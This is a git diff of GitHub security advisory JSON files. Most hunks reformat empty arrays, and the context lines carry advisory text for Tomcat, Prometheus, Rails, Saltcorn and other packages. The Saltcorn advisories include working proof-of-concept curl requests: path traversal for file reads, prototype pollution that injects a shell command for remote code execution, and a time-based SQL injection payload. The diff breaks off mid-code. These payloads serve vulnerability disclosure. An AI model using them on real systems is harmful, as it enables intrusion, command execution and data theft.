diff --git a/advisories/github-reviewed/2022/05/GHSA-36hp-4x3g-phrg/GHSA-36hp-4x3g-phrg.json b/advisories/github-reviewed/2022/05/GHSA-36hp-4x3g-phrg/GHSA-36hp-4x3g-phrg.json index d2ab2e58846..b18655b0f57 100644 --- a/advisories/github-reviewed/2022/05/GHSA-36hp-4x3g-phrg/GHSA-36hp-4x3g-phrg.json +++ b/advisories/github-reviewed/2022/05/GHSA-36hp-4x3g-phrg/GHSA-36hp-4x3g-phrg.json @@ -8,9 +8,7 @@ ], "summary": "Apache Tomcat's CookieExample Vulnerable to XSS", "details": "Multiple cross-site scripting (XSS) vulnerabilities in `examples/servlet/CookieExample` in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2022/05/GHSA-6j8f-66vh-39mj/GHSA-6j8f-66vh-39mj.json b/advisories/github-reviewed/2022/05/GHSA-6j8f-66vh-39mj/GHSA-6j8f-66vh-39mj.json index f9a111bd4f3..19bd1b5737b 100644 --- a/advisories/github-reviewed/2022/05/GHSA-6j8f-66vh-39mj/GHSA-6j8f-66vh-39mj.json +++ b/advisories/github-reviewed/2022/05/GHSA-6j8f-66vh-39mj/GHSA-6j8f-66vh-39mj.json @@ -8,9 +8,7 @@ ], "summary": "Apache Tomcat Mishandles Character Sequence in Cookies", "details": "Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the `\\\"` character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2022/05/GHSA-hc39-rjwp-qffq/GHSA-hc39-rjwp-qffq.json b/advisories/github-reviewed/2022/05/GHSA-hc39-rjwp-qffq/GHSA-hc39-rjwp-qffq.json index f0a56d66448..463545d3941 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hc39-rjwp-qffq/GHSA-hc39-rjwp-qffq.json +++ b/advisories/github-reviewed/2022/05/GHSA-hc39-rjwp-qffq/GHSA-hc39-rjwp-qffq.json @@ -8,9 +8,7 @@ ], "summary": "Apache Tomcat XSS Vulnerabilities in Examples Web Application", "details": "Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the `;` character, as demonstrated by a URI containing a `snp/snoop.jsp;` sequence.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { @@ -168,9 +166,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2023-09-22T21:05:33Z", diff --git a/advisories/github-reviewed/2022/12/GHSA-4v48-4q5m-8vx4/GHSA-4v48-4q5m-8vx4.json b/advisories/github-reviewed/2022/12/GHSA-4v48-4q5m-8vx4/GHSA-4v48-4q5m-8vx4.json index 019831275ef..753a1e27d4c 100644 --- a/advisories/github-reviewed/2022/12/GHSA-4v48-4q5m-8vx4/GHSA-4v48-4q5m-8vx4.json +++ b/advisories/github-reviewed/2022/12/GHSA-4v48-4q5m-8vx4/GHSA-4v48-4q5m-8vx4.json @@ -3,9 +3,7 @@ "id": "GHSA-4v48-4q5m-8vx4", "modified": "2022-12-05T22:02:05Z", "published": "2022-12-05T22:01:08Z", - "aliases": [ - - ], + "aliases": [], "summary": "Prometheus vulnerable to basic authentication bypass", "details": "### Impact\n\nPrometheus can be secured by a web.yml file that specifies usernames and hashed passwords for basic authentication.\n\nPasswords are hashed with bcrypt, which means that even if you have access to the hash, it is very hard to find the original password back.\n\nHowever, a flaw in the way this mechanism was implemented in the [exporter toolkit](https://github.com/prometheus/exporter-toolkit) makes it possible with people who know the hashed password to authenticate against Prometheus.\n\nA request can be forged by an attacker to poison the internal cache used to cache the computation of hashes and make subsequent requests successful. This cache is used in both happy and unhappy scenarios in order to limit side channel attacks that could tell an attacker if a user is present in the file or not.\n\n### Patches\n\nPrometheus 2.37.4 ([LTS](https://prometheus.io/docs/introduction/release-cycle/)) and 2.40.4 have been released to address this issue.\n\n### Workarounds\n\nThere is no workaround but attacker must have access to the hashed password, stored in disk, to bypass the authentication.", "severity": [ diff --git a/advisories/github-reviewed/2023/01/GHSA-rw83-v3pw-m362/GHSA-rw83-v3pw-m362.json b/advisories/github-reviewed/2023/01/GHSA-rw83-v3pw-m362/GHSA-rw83-v3pw-m362.json index e46f67a6529..741362dd53c 100644 --- a/advisories/github-reviewed/2023/01/GHSA-rw83-v3pw-m362/GHSA-rw83-v3pw-m362.json +++ b/advisories/github-reviewed/2023/01/GHSA-rw83-v3pw-m362/GHSA-rw83-v3pw-m362.json @@ -4,9 +4,7 @@ "modified": "2023-02-07T23:25:27Z", "published": "2023-01-30T06:30:27Z", "withdrawn": "2023-02-01T20:04:51Z", - "aliases": [ - - ], + "aliases": [], "summary": "Withdrawn: safeurl-python contains Server-Side Request Forgery", "details": "## Withdrawn\n\nThis advisory has been withdrawn as a duplicate of [GHSA-jgh8-vchw-q3g7](https://github.com/advisories/GHSA-jgh8-vchw-q3g7).\n\n## Original Description\n\nisInList in the safeurl-python package before 1.2 for Python has an insufficiently restrictive regular expression for external domains, leading to SSRF.", "severity": [ diff --git a/advisories/github-reviewed/2023/01/GHSA-vqqm-c9gx-773q/GHSA-vqqm-c9gx-773q.json b/advisories/github-reviewed/2023/01/GHSA-vqqm-c9gx-773q/GHSA-vqqm-c9gx-773q.json index 8301c4a2b95..6543a0bdabd 100644 --- a/advisories/github-reviewed/2023/01/GHSA-vqqm-c9gx-773q/GHSA-vqqm-c9gx-773q.json +++ b/advisories/github-reviewed/2023/01/GHSA-vqqm-c9gx-773q/GHSA-vqqm-c9gx-773q.json @@ -54,9 +54,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2023-02-01T01:38:25Z", diff --git a/advisories/github-reviewed/2023/06/GHSA-4g8v-vg43-wpgf/GHSA-4g8v-vg43-wpgf.json b/advisories/github-reviewed/2023/06/GHSA-4g8v-vg43-wpgf/GHSA-4g8v-vg43-wpgf.json index 773622fdddd..96c7fe3469a 100644 --- a/advisories/github-reviewed/2023/06/GHSA-4g8v-vg43-wpgf/GHSA-4g8v-vg43-wpgf.json +++ b/advisories/github-reviewed/2023/06/GHSA-4g8v-vg43-wpgf/GHSA-4g8v-vg43-wpgf.json @@ -8,9 +8,7 @@ ], "summary": "Actionpack has possible cross-site scripting vulnerability via User Supplied Values to redirect_to", "details": "The `redirect_to` method in Rails allows provided values to contain characters which are not legal in an HTTP header value. This results in the potential for downstream services which enforce RFC compliance on HTTP response headers to remove the assigned Location header. This vulnerability has been assigned the CVE identifier CVE-2023-28362.\n\nVersions Affected: All. Not affected: None Fixed Versions: 7.0.5.1, 6.1.7.4\n\n# Impact\n\nThis introduces the potential for a Cross-site-scripting (XSS) payload to be delivered on the now static redirection page. Note that this both requires user interaction and for a Rails app to be configured to allow redirects to external hosts (defaults to false in Rails >= 7.0.x).\n\n# Releases\n\nThe FIXED releases are available at the normal locations.\n\n# Workarounds\n\nAvoid providing user supplied URLs with arbitrary schemes to the `redirect_to` method.\n", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { @@ -74,9 +72,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2023-06-29T15:03:16Z", diff --git a/advisories/github-reviewed/2023/06/GHSA-gpv5-7x3g-ghjv/GHSA-gpv5-7x3g-ghjv.json b/advisories/github-reviewed/2023/06/GHSA-gpv5-7x3g-ghjv/GHSA-gpv5-7x3g-ghjv.json index 86cd43dd13a..1f996fc9263 100644 --- a/advisories/github-reviewed/2023/06/GHSA-gpv5-7x3g-ghjv/GHSA-gpv5-7x3g-ghjv.json +++ b/advisories/github-reviewed/2023/06/GHSA-gpv5-7x3g-ghjv/GHSA-gpv5-7x3g-ghjv.json @@ -3,14 +3,10 @@ "id": "GHSA-gpv5-7x3g-ghjv", "modified": "2023-06-15T19:05:13Z", "published": "2023-06-15T19:05:13Z", - "aliases": [ - - ], + "aliases": [], "summary": "fast-xml-parser regex vulnerability patch could be improved from a safety perspective", "details": "### Summary\nThis is a comment on https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-6w63-h3fj-q4vw and the patches fixing it.\n\n### Details\nThe code which validates a name calls the validator:\nhttps://github.com/NaturalIntelligence/fast-xml-parser/blob/ecf6016f9b48aec1a921e673158be0773d07283e/src/xmlparser/DocTypeReader.js#L145-L153\nThis checks for the presence of an invalid character. Such an approach is always risky, as it is so easy to forget to include an invalid character in the list. A safer approach is to validate entity names against the XML specification: https://www.w3.org/TR/xml11/#sec-common-syn - an ENTITY name is a Name:\n\n```\n[4] NameStartChar ::= \":\" | [A-Z] | \"_\" | [a-z] | [#xC0-#xD6] | [#xD8-#xF6] | [#xF8-#x2FF] | [#x370-#x37D] |\n [#x37F-#x1FFF] | [#x200C-#x200D] | [#x2070-#x218F] | [#x2C00-#x2FEF] | [#x3001-#xD7FF] |\n [#xF900-#xFDCF] | [#xFDF0-#xFFFD] | [#x10000-#xEFFFF]\n[4a] NameChar ::= NameStartChar | \"-\" | \".\" | [0-9] | #xB7 | [#x0300-#x036F] | [#x203F-#x2040]\n[5] Name ::= NameStartChar (NameChar)*\n```\n\nso the safest way to validate an entity name is to build a regex to represent this expression and check whether the name given matches the regex. (Something along the lines of `/^[name start char class][name char class]*$/`.) There's probably a nice way to simplify the explicit list rather than typing it out verbatim using Unicode character properties, but I don't know enough to do so.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { @@ -59,9 +55,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2023-06-15T19:05:13Z", diff --git a/advisories/github-reviewed/2023/07/GHSA-9gjg-834p-5gvv/GHSA-9gjg-834p-5gvv.json b/advisories/github-reviewed/2023/07/GHSA-9gjg-834p-5gvv/GHSA-9gjg-834p-5gvv.json index 31cef8893f4..ee98f50d250 100644 --- a/advisories/github-reviewed/2023/07/GHSA-9gjg-834p-5gvv/GHSA-9gjg-834p-5gvv.json +++ b/advisories/github-reviewed/2023/07/GHSA-9gjg-834p-5gvv/GHSA-9gjg-834p-5gvv.json @@ -4,9 +4,7 @@ "modified": "2023-08-01T20:09:43Z", "published": "2023-07-24T18:30:44Z", "withdrawn": "2023-08-01T20:09:43Z", - "aliases": [ - - ], + "aliases": [], "summary": "Duplicate Advisory: Keylime's registrar vulnerable to Denial-of-service attack via a single open connection", "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-pg75-v6fp-8q59. This link is maintained to preserve external references.\n\n## Original Description\nA flaw was found in Keylime. Due to their blocking nature, the Keylime registrar is subject to a remote denial of service against its SSL connections. This flaw allows an attacker to exhaust all available connections.", "severity": [ @@ -55,9 +53,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2023-08-01T20:09:43Z", diff --git a/advisories/github-reviewed/2023/08/GHSA-jm77-qphf-c4w8/GHSA-jm77-qphf-c4w8.json b/advisories/github-reviewed/2023/08/GHSA-jm77-qphf-c4w8/GHSA-jm77-qphf-c4w8.json index 6904a782c72..28ab0f7e584 100644 --- a/advisories/github-reviewed/2023/08/GHSA-jm77-qphf-c4w8/GHSA-jm77-qphf-c4w8.json +++ b/advisories/github-reviewed/2023/08/GHSA-jm77-qphf-c4w8/GHSA-jm77-qphf-c4w8.json @@ -3,14 +3,10 @@ "id": "GHSA-jm77-qphf-c4w8", "modified": "2023-08-01T22:34:41Z", "published": "2023-08-01T22:34:41Z", - "aliases": [ - - ], + "aliases": [], "summary": "pyca/cryptography's wheels include vulnerable OpenSSL", "details": "pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in cryptography 0.8-41.0.2 are vulnerable to several security issues. More details about the vulnerabilities themselves can be found in https://www.openssl.org/news/secadv/20230731.txt, https://www.openssl.org/news/secadv/20230719.txt, and https://www.openssl.org/news/secadv/20230714.txt.\n\nIf you are building cryptography source (\"sdist\") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { @@ -63,9 +59,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2023-08-01T22:34:41Z", diff --git a/advisories/github-reviewed/2023/08/GHSA-xqcq-j8w9-3pxv/GHSA-xqcq-j8w9-3pxv.json b/advisories/github-reviewed/2023/08/GHSA-xqcq-j8w9-3pxv/GHSA-xqcq-j8w9-3pxv.json index 66d725e895f..149192c9121 100644 --- a/advisories/github-reviewed/2023/08/GHSA-xqcq-j8w9-3pxv/GHSA-xqcq-j8w9-3pxv.json +++ b/advisories/github-reviewed/2023/08/GHSA-xqcq-j8w9-3pxv/GHSA-xqcq-j8w9-3pxv.json @@ -3,9 +3,7 @@ "id": "GHSA-xqcq-j8w9-3pxv", "modified": "2023-08-01T19:53:16Z", "published": "2023-08-01T19:53:16Z", - "aliases": [ - - ], + "aliases": [], "summary": "Jettison parser crash by stackoverflow", "details": "Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack.\n\n### References\n\n- https://nvd.nist.gov/vuln/detail/CVE-2022-40149\n- https://github.com/jettison-json/jettison/issues/45\n- https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46538\n- https://github.com/jettison-json/jettison/pull/49/files\n- https://github.com/jettison-json/jettison/releases/tag/jettison-1.5.1\n- https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html\n- https://www.debian.org/security/2023/dsa-5312", "severity": [ diff --git a/advisories/github-reviewed/2023/10/GHSA-7v4p-328v-8v5g/GHSA-7v4p-328v-8v5g.json b/advisories/github-reviewed/2023/10/GHSA-7v4p-328v-8v5g/GHSA-7v4p-328v-8v5g.json index 0c0d1439ed2..81963f02acf 100644 --- a/advisories/github-reviewed/2023/10/GHSA-7v4p-328v-8v5g/GHSA-7v4p-328v-8v5g.json +++ b/advisories/github-reviewed/2023/10/GHSA-7v4p-328v-8v5g/GHSA-7v4p-328v-8v5g.json @@ -3,14 +3,10 @@ "id": "GHSA-7v4p-328v-8v5g", "modified": "2023-10-17T02:37:42Z", "published": "2023-10-17T02:37:42Z", - "aliases": [ - - ], + "aliases": [], "summary": "Traefik vulnerable to HTTP/2 request causing denial of service ", "details": "### Impact\n\nA vulnerability CVE-2023-39325 exists in [Go managing HTTP/2 requests](https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo/m/UDd7VKQuAAAJ?pli=1), which impacts Traefik. This vulnerability could be exploited to cause a denial of service.\n\n### References\n\n- [CVE-2023-44487](https://www.cve.org/CVERecord?id=CVE-2023-44487)\n- [CVE-2023-39325](https://www.cve.org/CVERecord?id=CVE-2023-39325)\n\n### Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.10.5\n- https://github.com/traefik/traefik/releases/tag/v3.0.0-beta4", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2024/10/GHSA-277h-px4m-62q8/GHSA-277h-px4m-62q8.json b/advisories/github-reviewed/2024/10/GHSA-277h-px4m-62q8/GHSA-277h-px4m-62q8.json index d375c59b56a..b29c2e0dd51 100644 --- a/advisories/github-reviewed/2024/10/GHSA-277h-px4m-62q8/GHSA-277h-px4m-62q8.json +++ b/advisories/github-reviewed/2024/10/GHSA-277h-px4m-62q8/GHSA-277h-px4m-62q8.json @@ -3,9 +3,7 @@ "id": "GHSA-277h-px4m-62q8", "modified": "2024-10-03T19:46:12Z", "published": "2024-10-03T19:46:12Z", - "aliases": [ - - ], + "aliases": [], "summary": "@saltcorn/server arbitrary file zip read and download when downloading auto backups", "details": "### Summary\n\nA user with admin permission can read and download arbitrary zip files when downloading auto backups. The file name used to identify the zip file is not properly sanitized when passed to `res.download` API.\n\n### Details\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/admin.js#L671-L682\n\n```js\nrouter.get(\n \"/auto-backup-download/:filename\",\n isAdmin,\n error_catcher(async (req, res) => {\n const { filename } = req.params; // [1] source\n [...]\n if (\n !isRoot ||\n !(filename.startsWith(backup_file_prefix) && filename.endsWith(\".zip\")) // [2]\n ) {\n res.redirect(\"/admin/backup\");\n return;\n }\n const auto_backup_directory = getState().getConfig(\"auto_backup_directory\");\n res.download(path.join(auto_backup_directory, filename), filename); // [3] sink\n })\n);\n```\n\n### Steps to reproduce (PoC)\n\n- create a file with `.zip` extension under `/tmp` folder:\n```\necho \"secret12345\" > /tmp/secret.zip\n```\n- log into the application as an admin user\n- visit the url `http://localhost:3000/admin/auto-backup-download/sc-backup-%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsecret.zip`\n- download the zip file and then check if the zip was indeed downloaded:\n```bash\ncat secret.zip\nsecret12345\n```\n\n \n- Alternatively send the following request to retrieve the file just created.\n```bash\ncurl -i -X $'GET' \\\n -H $'Host: localhost:3000' \\\n -H $'Connection: close' \\\n -b $'connect.sid=VALID_CONNECT_SID_COOKIE' \\\n $'http://localhost:3000/admin/auto-backup-download/sc-backup-%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsecret.zip'\n```\n\n**NOTE**:\nTo obtain a valid `connect.sid` cookie, just open the developer console while logged and retrieve the cookie value.\n\n### Impact\n\nArbitrary zip files download (information disclosure).\n\n### Recommended Mitigation\n\nResolve the `filename` parameter before checking if it starts with `backup_file_prefix` .", "severity": [ diff --git a/advisories/github-reviewed/2024/10/GHSA-78p3-fwcq-62c2/GHSA-78p3-fwcq-62c2.json b/advisories/github-reviewed/2024/10/GHSA-78p3-fwcq-62c2/GHSA-78p3-fwcq-62c2.json index 61d1296421e..64a4e6f52e3 100644 --- a/advisories/github-reviewed/2024/10/GHSA-78p3-fwcq-62c2/GHSA-78p3-fwcq-62c2.json +++ b/advisories/github-reviewed/2024/10/GHSA-78p3-fwcq-62c2/GHSA-78p3-fwcq-62c2.json @@ -3,9 +3,7 @@ "id": "GHSA-78p3-fwcq-62c2", "modified": "2024-10-03T19:50:59Z", "published": "2024-10-03T19:50:59Z", - "aliases": [ - - ], + "aliases": [], "summary": "@saltcorn/server Remote Code Execution (RCE) / SQL injection via prototype pollution by manipulating `lang` and `defstring` parameters when setting localizer strings", "details": "### Summary\n\nThe endpoint `/site-structure/localizer/save-string/:lang/:defstring` accepts two parameter values: `lang` and `defstring`. These values are used in an unsafe way to set the keys and value of the `cfgStrings` object. It allows to add/modify properties of the `Object prototype` that result in several logic issues, including:\n- RCE vulnerabilities by polluting the `tempRootFolder` property \n- SQL injection vulnerabilities by polluting the `schema` property when using `PostgreSQL` database.\n\n\n### Details\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239\n```js\nrouter.post(\n \"/localizer/save-string/:lang/:defstring\",\n isAdmin,\n error_catcher(async (req, res) => {\n const { lang, defstring } = req.params; // source\n\n const cfgStrings = getState().getConfigCopy(\"localizer_strings\");\n if (cfgStrings[lang]) cfgStrings[lang][defstring] = text(req.body.value); // [1] sink\n else cfgStrings[lang] = { [defstring]: text(req.body.value) };\n await getState().setConfig(\"localizer_strings\", cfgStrings);\n res.redirect(`/site-structure/localizer/edit/${lang}`);\n })\n);\n```\n\n### PoC\n\nSetup:\n- set `SALTCORN_NWORKERS=1` before starting the `saltcorn` server (to easily observe the behavior of the PoC)\n```\nSALTCORN_NWORKERS=1 saltcorn serve\n```\n- make sure to use PostgresSQL backend\n- login with a user with admin permission\n\n#### RCE\n\nThis PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain command executed.\n- check that the file that will be created does not exists:\n```\ncat /tmp/RCE\ncat: /tmp/RCE: No such file or directory\n```\n\n- pollute the `Object.prototype` with a `tempRootFolder` value set to `;echo+\"rce\"|tee+/tmp/RCE;` by sending the following request *** :\n\n```bash\ncurl -i -X $'POST' \\\n -H $'Host: localhost:3000' \\\n -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' \\\n -H $'Origin: http://localhost:3000' \\\n -H $'Connection: close' \\\n -b $'loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE' \\\n --data-binary $'_csrf=VALID_csrf_Value&value=;echo+\"rce\"|tee+/tmp/RCE;' \\\n $'http://localhost:3000/site-structure/localizer/save-string/__proto__/tempRootFolder'\n```\n\n visit `http://localhost:3000/plugins/new`\n- enter the following fields:\n\t- Name: `test`\n\t- Source: `git`\n\t- other fields blank\n - click `Create`\n- you will get an error but the command `echo \"rce\" | tee /tmp/RCE` will be executed\n- to verify:\n```\ncat /tmp/RCE\nrce\n```\n\nThe RCE occurs because after the previous curl request, the `tempRootFolder` property is set to `;echo+\"rce\"|tee+/tmp/RCE;` that is later used to build the shell commands.\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L45-L58\n\n```js\nclass PluginInstaller {\n constructor(plugin, opts = {}) { // opts will have the tempRootFolder property set with dangerous values // [2]\n [...]\n this.tempRootFolder =\n opts.tempRootFolder || envPaths(\"saltcorn\", { suffix: \"tmp\" }).temp; // [3]\n\t [...]\n this.pckJsonPath = join(this.pluginDir, \"package.json\");\n this.tempDir = join(this.tempRootFolder, \"temp_install\", ...tokens); // [4]\n [...]\n }\n [...]\n}\n```\n\n#### SQL Injection\n\nThis PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain SQL queries (i.e SQLi).\n- visit `http://localhost:3000/table` to check the page returns some results (no errors)\n- pollute the `Object.prototype` with a schema value set to `\"` (just to create an exception in the query that will be executed to demonstrate the issue) by sending the following request *** :\n\n```\ncurl -i -X $'POST' \\\n -H $'Host: localhost:3000' \\\n -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' \\\n -H $'Origin: http://localhost:3000' \\\n -H $'Connection: close' \\\n -b $'loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE' \\\n --data-binary $'_csrf=VALID_csrf_Value&value=\\\"' \\\n $'http://localhost:3000/site-structure/localizer/save-string/__proto__/schema'\n```\n\n- visit again `http://localhost:3000/table` but this time an SQL error will appear:\n```\nsyntax error at or near \"\" order by lower(\"\"\n```\n\n\n**NOTE**: Another payload to use as `value` could be `pg_user\"+WHERE+1=1+AND+(SELECT+pg_sleep(5))+IS+NOT+NULL+--`\n\nThe SQL injection occurs because after the previous curl request, the `schema` property is set to `\"`.\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/postgres/postgres.js#L101\n\n```js\nconst select = async (tbl, whereObj, selectopts = {}) => { // [2] selectopts\n const { where, values } = mkWhere(whereObj);\n const schema = selectopts.schema || getTenantSchema(); // [3] selectopts.schema\n const sql = `SELECT ${\n selectopts.fields ? selectopts.fields.join(\", \") : `*`\n } FROM \"${schema}\".\"${sqlsanitize(tbl)}\" ${where} ${mkSelectOptions( // [4] schema\n selectopts,\n values,\n false\n )}`;\n sql_log(sql, values);\n const tq = await (client || selectopts.client || pool).query(sql, values);\n\n return tq.rows;\n};\n```\n\n*** Retrieve valid values for the `connect.sid` (`VALID_CONNECT_SID_COOKIE`) and `_csrf` values (`VALID_csrf_Value`) :\n- open the browser developer console and go to the `Network` tab\n- visit `http://localhost:3000/site-structure/localizer/add-lang`\n- add a language (`Name: test` , `Locale: test`) and click `Save`\n- under the `Network` tab, filter for `save-lang` and check the request parameters (`Headers` and `Payload`/`Request` tabs)\n- copy the values for `connect.sid` and `_csrf` and paste in the curl command above\n\n### Impact\n\nRemote code execution (RCE), Sql injection and business logic errors.\n\n### Recommended Mitigation\n\nCheck the values of `lang` and `defstring` parameters against dangerous properties like `__proto__`, `constructor`, `prototype`.", "severity": [ diff --git a/advisories/github-reviewed/2024/10/GHSA-cfqx-f43m-vfh7/GHSA-cfqx-f43m-vfh7.json b/advisories/github-reviewed/2024/10/GHSA-cfqx-f43m-vfh7/GHSA-cfqx-f43m-vfh7.json index 685e7b45bb6..8b81f026146 100644 --- a/advisories/github-reviewed/2024/10/GHSA-cfqx-f43m-vfh7/GHSA-cfqx-f43m-vfh7.json +++ b/advisories/github-reviewed/2024/10/GHSA-cfqx-f43m-vfh7/GHSA-cfqx-f43m-vfh7.json @@ -3,9 +3,7 @@ "id": "GHSA-cfqx-f43m-vfh7", "modified": "2024-10-03T19:46:43Z", "published": "2024-10-03T19:46:42Z", - "aliases": [ - - ], + "aliases": [], "summary": "@saltcorn/server arbitrary file and directory listing when accessing build mobile app results", "details": "### Summary\n\nA user with admin permission can read arbitrary file and directory names on the filesystem by calling the `admin/build-mobile-app/result?build_dir_name=` endpoint. The `build_dir_name` parameter is not properly validated and it's then used to construct the `buildDir` that is read. The file/directory names under the `buildDir` will be returned. \n\n### Details\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/admin.js#L2884-L2893\n\n```js\nrouter.get(\n \"/build-mobile-app/result\",\n isAdmin,\n error_catcher(async (req, res) => {\n const { build_dir_name } = req.query; // [1] source\n const rootFolder = await File.rootFolder();\n const buildDir = path.join(\n rootFolder.location,\n \"mobile_app\",\n build_dir_name // [2]\n );\n const files = await Promise.all(\n fs\n .readdirSync(buildDir) // [3] sink\n .map(async (outFile) => await File.from_file_on_disk(outFile, buildDir))\n );\n [...]\n })\n);\n```\n\n### PoC\n\n- log into the application as an admin user\n- visit the following url: `http://localhost:3000/admin/build-mobile-app/result?build_dir_name=/../../../../../../../../`\n\n\n**NOTE**: it's possible to only see file and directory names but not to download their content.\n\n### Impact\n\nInformation disclosure\n\n### Recommended Mitigation\n\nResolve the `buildDir` and check if it starts with `${rootFolder.location}/mobile_app`.", "severity": [ diff --git a/advisories/github-reviewed/2024/10/GHSA-fm76-w8jw-xf8m/GHSA-fm76-w8jw-xf8m.json b/advisories/github-reviewed/2024/10/GHSA-fm76-w8jw-xf8m/GHSA-fm76-w8jw-xf8m.json index 8fcdcd16868..72e5a3cead7 100644 --- a/advisories/github-reviewed/2024/10/GHSA-fm76-w8jw-xf8m/GHSA-fm76-w8jw-xf8m.json +++ b/advisories/github-reviewed/2024/10/GHSA-fm76-w8jw-xf8m/GHSA-fm76-w8jw-xf8m.json @@ -3,9 +3,7 @@ "id": "GHSA-fm76-w8jw-xf8m", "modified": "2024-10-03T22:21:24Z", "published": "2024-10-03T22:21:24Z", - "aliases": [ - - ], + "aliases": [], "summary": "@saltcorn/plugins-loader unsanitized plugin name leads to a remote code execution (RCE) vulnerability when creating plugins using git source", "details": "### Summary\n\nWhen creating a new plugin using the `git` source, the user-controlled value `req.body.name` is used to build the plugin directory where the location will be cloned. The API used to execute the `git clone` command with the user-controlled data is `child_process.execSync`. Since the user-controlled data is not validated, a user with admin permission can add escaping characters and execute arbitrary commands, leading to a command injection vulnerability.\n\n### Details\n\nRelevant code from source (`req.body`) to sink (`child_process.execSync`).\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/plugins.js#L1400\n\n```js\nrouter.post(\n \"/\",\n isAdmin,\n error_catcher(async (req, res) => {\n const plugin = new Plugin(req.body); // [1] \n [...]\n try {\n await load_plugins.loadAndSaveNewPlugin( // [3] \n plugin,\n schema === db.connectObj.default_schema || plugin.source === \"github\"\n );\n [...]\n }\n })\n);\n```\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/saltcorn-data/models/plugin.ts#L44\n```js\nclass Plugin {\n [...]\n constructor(o: PluginCfg | PluginPack | Plugin) {\n [...]\n this.name = o.name; // [2] \n [...]\n}\n```\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/load_plugins.js#L64-L65\n```js\nconst loadAndSaveNewPlugin = async (plugin, force, noSignalOrDB) => {\n [...]\n const loader = new PluginInstaller(plugin); // [4] \n const res = await loader.install(force); // [7] \n [...]\n};\n```\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L41-L61\n```js\nclass PluginInstaller {\n constructor(plugin, opts = {}) {\n [...]\n const tokens =\n plugin.source === \"npm\"\n ? plugin.location.split(\"/\")\n : plugin.name.split(\"/\"); // [5] \n [...]\n this.tempDir = join(this.tempRootFolder, \"temp_install\", ...tokens); // [6] \n [...]\n }\n\n \n async install(force) {\n [...]\n if (await this.prepPluginsFolder(force, pckJSON)) { // [8] \n [...]\n }\n\n async prepPluginsFolder(force, pckJSON) {\n [...]\n switch (this.plugin.source) {\n [...]\n case \"git\":\n if (force || !(await pathExists(this.pluginDir))) { \n await gitPullOrClone(this.plugin, 